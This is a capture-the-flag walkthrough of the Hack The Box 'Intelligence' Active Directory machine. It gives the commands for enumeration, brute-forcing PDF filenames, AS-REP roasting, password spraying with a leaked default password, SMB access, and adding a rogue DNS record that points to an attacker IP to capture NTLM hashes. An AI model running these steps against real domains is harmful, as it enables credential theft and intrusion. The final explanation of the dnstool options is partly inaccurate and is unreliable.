🧠Intelligence

https://app.hackthebox.com/machines/357

I start by doing a Nmap -p- without anything to know all the ports open, then throw in a big command to properly enumerate the open ports to win some time:

nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,3269,3268,5985,9389,49667,49691,49692,49709,49713,54414 10.129.44.184

I then go on the http webpage on port 80 and use feroxbuster:

feroxbuster -u http://intelligence.htb -w /usr/share/SecLists/Discovery/Web-Content/raft-medium-directories.txt

the /documents is forbidden ->

but the subdomains are not

Nothing to see in the first place but then I saw that this was a PDF and not a txt oriented file, let's see if there is exif data ->

exiftool 2020-01-01-upload.pdf

there was another PDF in the subdomains ->

Ok so we get 2 possible users? Let's continue enumeration:

kerbrute userenum --dc 10.129.44.184 -d intelligence.htb users

No we need to check to see if either has the don’t require preauth flag set, which would leak the users hash (this is AS-REP-roasting):

GetNPUsers.py -no-pass -dc-ip 10.129.44.184 intelligence.htb/Jose.Williams
GetNPUsers.py -no-pass -dc-ip 10.129.44.184 intelligence.htb/William.Lee

That got me thinking that the PDFs are named based on the date they were created. So, we can conclud that we could potentially bruteforce the PDF names and download them that are not referenced in the website.

So we create a little script in python or bash to follow the nomenclature of the website:

#!/bin/bash
DATE=2020-01-01

for i in {0..366}
do
       NEXT_DATE=$(date +%Y-%m-%d -d "$DATE + $i day")
          echo "$NEXT_DATE""-upload"
      done

chmod +x dates4bruteforce.sh
./dates4bruteforce.sh > pdfname

and the one-liner to go and bruteforce and download all of this:

for i in $(cat ../pdfname); do wget http://10.129.44.184/documents/$i".pdf"; done

i made a folder to store all of the PDF's

after manually looking we find a PDF with default password:

We can easily say to ourselves that there is Exif data on all of them with valid users, we need to script it out:

find . *.pdf|xargs exiftool |grep Creator|awk '{print $3}' >  userPDF.txt

So now we can spray this password to see if anyone left it by default:

crackmapexec smb 10.129.44.184 -u userPDF.txt -p NewIntelligenceCorpUser9876 --continue-on-success

So this Tiffany.Molina user left password by default

Now let's try to dig out on the SMB side of the user:

smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.129.44.184

and then we connect in the Users share:

smbclient -U Tiffany.Molina //10.129.44.184/Users NewIntelligenceCorpUser9876

And pull the user flag out of the Desktop:

further enumeration led to going in the IT share ->

We find this PowerShell script:

The script goes into LDAP and gets a list of all the computers, and then loops over the ones where the name starts with “web”. It will try to issue a web request to that server (with the running users’s credentials), and if the status code isn’t 200, it will email Ted.Graves and let them know that the host is down. The comment at the top says it is scheduled to run every five minutes.

in theory, if we can add a DNS record that starts with web, which points to a machine that we control, then we can potentially get the NTLM hash of the user, the script is running as!

dnstool.py is a script that comes with Krbrelayx

before interacting with Kerberos, we have to make sure that our machine’s time is in sync with the target machine. Generally, we can use things like Nmap output, HTTP header etc to determine the target’s time and change our machine time with date command.

sudo ntpdate 10.129.44.184

then we go and interract ->

python dnstool.py -u intelligence.htb\\Tiffany.Molina -p NewIntelligenceCorpUser9876 -r webfelix.intelligence.htb -a add -d 10.10.14.166 10.129.44.184

-u: This option specifies the username for authentication. In this case, the username is intelligence.htb\\Tiffany.Molina.
-p: This option specifies the password for authentication. Here, the password is NewIntelligenceCorpUser9876.
-r: This option specifies the remote DNS server to which the tool will connect. Here, the remote DNS server is webfelix.intelligence.htb.
-a: This option specifies the action to perform. The value add indicates that a new DNS record will be added.
-d: This option specifies the IP addresses for the DNS record. In this case, the IP addresses are 10.10.14.166 and 10.129.44.184. in summary, this command is attempting to add a new DNS record to the webfelix.intelligence.htb remote DNS server using the provided username and password, with the new DNS record pointing to the IP addresses 10.10.14.166 and 10.129.44.184.